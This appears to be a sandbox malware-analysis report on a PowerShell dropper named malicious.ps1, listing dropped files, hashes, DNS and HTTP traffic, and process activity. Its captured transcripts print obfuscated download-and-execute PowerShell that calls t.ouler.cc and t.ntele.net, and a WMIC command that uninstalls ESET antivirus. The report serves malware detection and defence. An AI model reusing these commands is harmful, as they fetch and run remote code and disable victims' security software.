  SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
  SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
  Malicious: false
  Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4vo42c5.32s.psm1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A Malicious: false Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogvuf2od.24o.ps1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A Malicious: false Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3ede30a.tgp.ps1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A Malicious: false Preview: 1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\94W9CQGTJ8OHXP5R3URQ.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: dropped Size (bytes): 6205 Entropy (8bit): 3.76119249482477 Encrypted: false SSDEEP: 96:kW+9mmW60CO+S/q3kvhkvCCt4KNHbKNHM:V+9mmBPb48V MD5: A49EC9E654F5E56A05616C41231636D4 SHA1: 20EEBB1C821C13A041003245356AC5C4EFB9C726 SHA-256: 2BE5A6119F4EF7C37EF3AB34AFB9F0706CDE7B180E48914278A1389F9085F40A SHA-512: 1E8861D065ABE6067D75C97E47872B40789BD9F036D31DF362F1C8F0F8589726AAF2C0045FB92869A64649048B7E9C6412057EF58D4F59F7821638ED53362E6C Malicious: false Preview: ...... FL...... F."...... J...-...rt^.`..\...... :..DG..Yr?.D..U..k0.&...&...... -..,U.S.....:*..b...... t...CFSF..1...... N....AppData...t.Y^...H.g.3..( .....gVA.G..k...@...... N...Rh...... Y...... yN|.A.p.p.D.a.t.a...B.V.1...... N....Roaming.@...... N...Rh...... Y...... K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D...... N... Rh...... Y...... sJ.M.i.c.r.o.s.o.f.t.....V.1.....>Q{<..Windows.@...... N...Rh...... Y...... ;.W.i.n.d.o.w.s...... 1...... N....STARTM~1..n...... N..>Q.;.....Y...... D. ....6...S.t.a.r.t. [email protected].,.-.2.1.7.8.6...... 1...... P.S..Programs..j...... N..>Q.;.....Y...... @...... [email protected].,.-.2.1.7.8.2..... n.1...... L...WINDOW~1..V...... N..>QZ7.....Y...... T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2...... L.. .WINDOW~1.LNK..^...... N...P3Q.....Y......

C:\Users\user\Documents\20210616\PowerShell_transcript.445817.XZ9drXoY.20210616182728.txt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Category: dropped Size (bytes): 9240 Entropy (8bit): 5.321363153813042 Encrypted: false SSDEEP: 192:Mqmy270vFR/ba/H4abIbf4ab3WZ3B4U4aEEArrrrl:Mqmy270vFR/bahbItb6Krrrrl MD5: 047791CFD6517246FC9795DA9BB623AA SHA1: E7CCAF450589DDF951EF6F68F277AA61BC4C480E SHA-256: F773F8DD28C2059A09410B232373A9B7D69E2211AA394A3E23FCFE813735D19A SHA-512: 8D51DBF3C4BC6AD16564BC8584FC3A215A21951750899F1228FB3D9E648874B44174471CFBD2917453171BA22CD7C60C409D5B0FC0AFB875CC5DAFA95DFDACF1 Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210616182729..Username: computer\user.. User: computer\user..Configuration Name: ..Machine: 445817 ( NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noLogo -ExecutionPolicy unrestricted -file C:\Users\user\Desktop\malicious.ps1..Process ID: 7148..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210616182729..**********************..PS>CommandInvocation(malicious.ps1): "malicious.ps1"..=gim : The term '=gim' is not recognized as the name of a cmdlet, function, script file, or operable program. Check..the spelling of the name, or if a path was included, verify th

C:\Users\user\Documents\20210616\PowerShell_transcript.445817.lHI+ki+5.20210616182730.txt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Category: dropped Size (bytes): 3136 Entropy (8bit): 5.271494414019607 Encrypted: false SSDEEP: 96:BZxjtNlqDo1ZnZnjtNlqDo1ZxbvOGmmGmmqmVZ8:hvOGmmGmmqmE MD5: 9906789421C31D66FACB1DD9120A14EA SHA1: 2DB78BE5B140CC2ABD9C01DCF0BCB186AB88AFEE SHA-256: D08E0B6C6463C9C0B33E4EB89255C12DD21CD24E4EB539D828CC36369A267963 SHA-512: D881AA3A98D49195BDE7E7062FBB80C0CF3F0FAA465823E89FDFA1E8E100C9FC6470D44F44A66689EFA6604703EB2AFC640A404666ED5FF03F3104AA86D0A544 Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210616182730..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c IEx =gim..Process ID: 5916..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210616182730..**********************..PS>IEx =gim..**********************..Windows PowerShell transcript start..Start time: 20210616183256..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v

C:\Windows\System32\20210616\PowerShell_transcript.445817.5MfyPqnp.20210616182839.txt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators Category: dropped Size (bytes): 2309 Entropy (8bit): 5.958391998830944 Encrypted: false SSDEEP: 48:BZ1vNtoOfpiGyh2w45Dj9j4dDcjlGqDYB1ZFpiGyh2w45Dj9j4dDcjG:BZ5NtNfpip0Dj9j2DcsqDo1ZFpip0DjA MD5: F3E84CD071ACCBFBEEF1287E39E17A39 SHA1: DF57600C9CB5CC33F241DD28228A2270C061577F SHA-256: 321BA0B6310F694D12ABC3E64214BA616DBBFC55B5257532C17F1D4CEEC3F46B SHA-512: CBA2321872E7D73628E37BFC807447B2FEE65420923E084C5528A90B894140A4295BF0538242E3057C55A8301276EF6F07193B38EC948B625E23B8E62AE0D659 Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210616182840..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).DownloadData($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.oul'+'er.cc';a($url+'/

C:\Windows\System32\20210616\PowerShell_transcript.445817.5hlgzxzH.20210616182846.txt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators Category: dropped Size (bytes): 5450 Entropy (8bit): 5.830394031528827 Encrypted: false SSDEEP: 96:BZMNtNfpip0Dj9j2Dc0qDo1ZSpip0Dj9j2DcLZ1NtNfpip0Dj9j2Dc0qDo1Z5L2r:mo4pDo4pZo4psss6 MD5: E0FE70C33FECFFE060B7ED2E1A15ABEA SHA1: B27C6DF13C5CC109E075A2CA943A731FB4F94B3B SHA-256: D7F6DE01F1075F2E0E5F3199D7ADB4222765CFB781DBFB85F2594A41656D12B1 SHA-512: AF4C7B71B7FDF8A0BDA7D7307ECE096F26544CDE720E4C7BE9A4C41FBC5DB801D81327D503CDD2F0E416F9E577792B3C15B16CBBAF365562DCE7284908F552DA Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210616182847..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).DownloadData($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.nte'+'le.net';a($url+'

C:\Windows\System32\20210616\PowerShell_transcript.445817.hwRyXbY9.20210616182823.txt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Category: dropped Size (bytes): 3163 Entropy (8bit): 5.330124904152896 Encrypted: false SSDEEP: 96:BZPNtNsqDo1ZlZONtNsqDo1ZOXv2q9nq9n+9SZz:3v2qRqR+C MD5: 6B2F449830A4A1B71458C3B5A3AC3D63 SHA1: 7FD090FD1CF28CE0BFB29762D0A8099F665B2A59 SHA-256: 0AF764155E2B327BFB0B68B2D559BFE62F56013D7E322978D4016F9E1DD1766A SHA-512: 5341F1290B0EA9F72307108026AD8A5CF69690D4B5984FD16BD102B0C325FDF864A59AA00E9B4CDA3C2193F7566E6017C51402A763269272AF4FDA22F4840DD1 Malicious: false Preview: .**********************..Windows PowerShell transcript start..Start time: 20210616182824..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c PS_CMD..Process ID: 6132..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210616182824..**********************..PS>PS_CMD..**********************..Windows PowerShell transcript start..Start time: 20210616183248..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell

C:\Windows\System32\WindowsPowerShell\v1.0\ncETd2A.exe Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: PE32+ executable (console) x86-64, for MS Windows Category: dropped Size (bytes): 447488 Entropy (8bit): 5.440627434620499 Encrypted: false SSDEEP: 6144:f1eapvqlkiMWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:NzW2KXzJ4pdd3klnnWosPhnzq MD5: 95000560239032BC68B4C2FDFCDEF913 SHA1: 1B3B40FBC889FD4C645CC12C85D0805AC36BA254 SHA-256: D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677 SHA-512: F990F72F4D90CE49F7A44DA0C0CDD82D56A7DC7461E073646ACFD448379B2ADEFD6E29FB2A596A9C8819DE53FA709905C98007B70DD4CF98569373013E42EE49 Malicious: true Antivirus: Metadefender, Detection: 3%; ReversingLabs, Detection: 0% Joe Sandbox View: Filename: mltqanainst.exe, Detection: malicious; Filename: lemonduck.bat, Detection: malicious Preview: MZ...... @...... !..L.!This program cannot be run in DOS mode....$...... G...... G...... +...... Rich...... PE..d....)...... "...... P...... 2...... @...... `...... |@...... p...}...`...... 0...P...T...... (...... text...... `.rdata...... @[email protected]...... <...... @....pdata...... `...... B...... @[email protected]....}...p...~...L...... @[email protected]...... @..B......

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: dropped Size (bytes): 57895 Entropy (8bit): 5.080080220298808 Encrypted: false SSDEEP: 1536:fB0+jH0PgNxV3CNBQkj22h4iUxKflJd6a59/rOu6CjKSSZWrxTeNgtAHkIh3Cwno:J0+jH04NxV3CNBQkj22qiUKflJd6a59l MD5: 4C72EAB6D884821C1A35BBA60F26B1CC SHA1: 50AB1C2DA70FE7957F5EEA83A2F7DC9BC50FD69C SHA-256: 2703E9C6DDEE61DDC9C86391A0E24AA8141385E844D5B96397CDF3E8D1DE72BE SHA-512: CA73E5B16131AAA22B1CB5F6E0083CDD38FDC4CAA84D378B927E6B6881D54E890F1093FA240D6E3C39CC56E2F9111E8B0703C53DF435367A60C7575D537BCC27 Malicious: false Preview: PSMODULECACHE.X...... I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L...... Update-SmbMultichannelConnection...... gsmbse...... Get-SmbClientNetworkInterface...... Get-SmbOpenFile...... rksmba...... gsmbsc...... Revoke-SmbShareAccess...... nsmbm...... nsmbgm...... Set-SmbClientConfiguration...... Get-SmbBandWidthLimit...... New-SmbGlobalMapping...... ssmbcc...... cssmbse...... gsmbt...... Block-SmbShareAccess...... dsmbd...... gsmbs...... Remove-SmbMultichannelConstraint...... Get-SmbMultichannelConnection...... Unblock-SmbShareAccess...... Get-SmbServerConfiguration...... Enable-SmbDelegation...... gsmbo...... gsmbm...... udsmbmc...... Close-SmbOpenFile...... Disable-SmbDelegation...... gsmbd...... gsmbcn...... gsmbb...... gsmbc...... Get-SmbServerNetworkInterface...... gsmba...... Set-SmbServerConfiguration...... gsmbcc...... Remove-SmbMapping...... rsmbm...... grsmba...... Get-SmbShareAccess...... ulsmba.....

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: dropped Size (bytes): 1196 Entropy (8bit): 5.356421956480846 Encrypted: false SSDEEP: 24:3anPpQrLAo4KAxX5qRPD42FCvKMOoFe9tOBPnKdSl9rKq:qnPerB4nqRL/FCvNvFe9tOBfuur MD5: 7E30B19C55A8DB436BE72229FF7C9E07 SHA1: E417906D3E3CF505ABA82610F83D2F67B61887AC SHA-256: 312895C06FB6DB27FA06E9179EB97907DC73A44F95F581547C6518415CC099B6 SHA-512: E3E53DDEA2B9DFFE3DEF21953B28E2394E0CA851FC1052A27A5E071441EBEDA40C0C8F9FDB2A02946292BCCC5E4A79B8C6C09A923FAA6D1E630D12794C6A7980 Malicious: false Preview: @...e...... 8...... @...... 8...... '....L..}...... System.Numerics.H...... <@.^.L."My...:...... Microsoft.PowerShell.ConsoleHost0...... G-.o.. .A...4B...... System..4...... [...{a.C..%6..h...... System.Core.D...... fZve...F.....x.)...... System.Management.AutomationL...... 7.....J@...... ~...... #.Microsoft.Management.Infrastructure.<...... H..QN.Y.f...... System.Management...@...... Lo...QN......

C:\Windows\Temp\__PSScriptPolicyTest_1pmnnlzv.hvf.psm1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A Malicious: false Preview: 1

C:\Windows\Temp\__PSScriptPolicyTest_3tg2ae12.gkp.ps1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A Malicious: false Preview: 1

C:\Windows\Temp\__PSScriptPolicyTest_gidcembc.kyn.ps1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A Malicious: false Preview: 1

C:\Windows\Temp\__PSScriptPolicyTest_k3lcavma.h2b.psm1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A Malicious: false Preview: 1

C:\Windows\Temp\__PSScriptPolicyTest_tf4zkawf.54y.ps1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A Malicious: false Preview: 1

C:\Windows\Temp\__PSScriptPolicyTest_wichkcxw.kk0.psm1 Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A Malicious: false Preview: 1

\Device\ConDrv Process: C:\Windows\System32\netsh.exe File Type: ASCII text, with CRLF line terminators Category: dropped Size (bytes): 7 Entropy (8bit): 2.2359263506290326 Encrypted: false SSDEEP: 3:t:t MD5: F1CA165C0DA831C9A17D08C4DECBD114 SHA1: D750F8260312A40968458169B496C40DACC751CA SHA-256: ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8 SHA-512: 052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646 Malicious: false Preview: Ok.....

Static File Info

General File type: ASCII text, with very long lines, with CRLF line terminators Entropy (8bit): 4.252596265687726 TrID: File name: malicious.ps1 File size: 8039 MD5: 75f885a4e9484ce240815f89be7427c5 SHA1: cd3ef6f1125a23ae02e63e9b3dc62551c1842aec SHA256: 7829a0b0e536f60e76ca6fe6aa4f76f6cc61432b8aee30f75de1d5ee2ef729a5 SHA512: 1c472a6d3c5d0d179c33f3c40ffb7c3e2cec3dee9d67e6681a69c886d832b87ff3ba6cc0ef350356a5580c1c50145fa3581dd36a94a9ce3fd4004c902f8b0c67 SSDEEP: 192:orkwOVpdidA3BlFdEx5C402qAhheM5cFIX+Yv2QIQJewKNqtYwh:oQwOVrtd+5C40MheM5cc+YvFISyGh File Content Preview: C:\Windows\System32\WindowsPowerShell\v1.0\power .exe -c IEx $v='gim';..I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('4d78d7cef4ca95ddab7c179e39e717a59f39e98e39e7d06c0a82c166ce395a7e77b

File Icon

Icon Hash: 72f2d6fef6f6dae4

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 16, 2021 18:28:46.907397032 CEST | 192.168.2.4 | 8.8.8.8 | 0x7c0a | Standard query (0) | t.ouler.cc | A (IP address) | IN (0x0001)
Jun 16, 2021 18:28:46.993536949 CEST | 192.168.2.4 | 8.8.8.8 | 0x75d2 | Standard query (0) | t.ouler.cc | A (IP address) | IN (0x0001)
Jun 16, 2021 18:28:56.570617914 CEST | 192.168.2.4 | 8.8.8.8 | 0xb343 | Standard query (0) | t.ntele.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 16, 2021 18:28:46.978871107 CEST | 8.8.8.8 | 192.168.2.4 | 0x7c0a | No error (0) | t.ouler.cc | cvc.7766.org | - | CNAME (Canonical name) | IN (0x0001)
Jun 16, 2021 18:28:46.978871107 CEST | 8.8.8.8 | 192.168.2.4 | 0x7c0a | No error (0) | cvc.7766.org | - | 209.141.33.145 | A (IP address) | IN (0x0001)
Jun 16, 2021 18:28:47.054102898 CEST | 8.8.8.8 | 192.168.2.4 | 0x75d2 | No error (0) | t.ouler.cc | cvc.7766.org | - | CNAME (Canonical name) | IN (0x0001)
Jun 16, 2021 18:28:47.054102898 CEST | 8.8.8.8 | 192.168.2.4 | 0x75d2 | No error (0) | cvc.7766.org | - | 209.141.33.145 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

t.ouler.cc

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49758 | 209.141.33.145 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

kBytes transferred | Timestamp | Direction | Data
2077 | Jun 16, 2021 18:28:47.353111982 CEST | OUT | GET /a.jsp?_20210616?computer*computer$*FB9C3542-FA73-1B4E-FBA4-60E77BE54AED*903551864 HTTP/1.1 Host: t.ouler.cc Connection: Keep-Alive
2079 | Jun 16, 2021 18:28:47.556508064 CEST | IN | HTTP/1.1 200 OK : nginx Date: Wed, 16 Jun 2021 16:28:47 GMT Content-Type: application/octet-stream Content-Length: 10961 Last-Modified: Wed, 09 Jun 2021 00:36:50 GMT Connection: keep-alive ETag: "60c00d22-2ad1" Accept-Ranges: bytes

Code Manipulations

Statistics

Behavior


System Behavior

Analysis Process: powershell.exe PID: 7148 Parent PID: 5984

General

Start time: 18:27:26 Start date: 16/06/2021 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\malicious.ps1' Imagebase: 0x7ff7bedd0000 File size: 447488 bytes MD5 hash: 95000560239032BC68B4C2FDFCDEF913 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high

File Activities

File Created

File Deleted

File Written

File Read

Analysis Process: conhost.exe PID: 6164 Parent PID: 7148

General

Start time: 18:27:27 Start date: 16/06/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff724c50000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: powershell.exe PID: 5916 Parent PID: 7148

General

Start time: 18:27:30 Start date: 16/06/2021 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -c IEx =gim Imagebase: 0x7ff7bedd0000 File size: 447488 bytes MD5 hash: 95000560239032BC68B4C2FDFCDEF913 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high

File Activities

File Created

File Deleted

File Written

File Read

Analysis Process: cmd.exe PID: 2856 Parent PID: 7148

General

Start time: 18:28:11 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Eset%'' call uninstall /nointeractive Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities

Analysis Process: WMIC.exe PID: 6488 Parent PID: 2856

General

Start time: 18:28:12 Start date: 16/06/2021 Path: C:\Windows\System32\wbem\WMIC.exe Wow64 process (32bit): false Commandline: wmic.exe product where 'name like '%Eset%'' call uninstall /nointeractive Imagebase: 0x7ff6fa870000 File size: 521728 bytes MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

File Activities

File Written

Analysis Process: cmd.exe PID: 1076 Parent PID: 7148

General

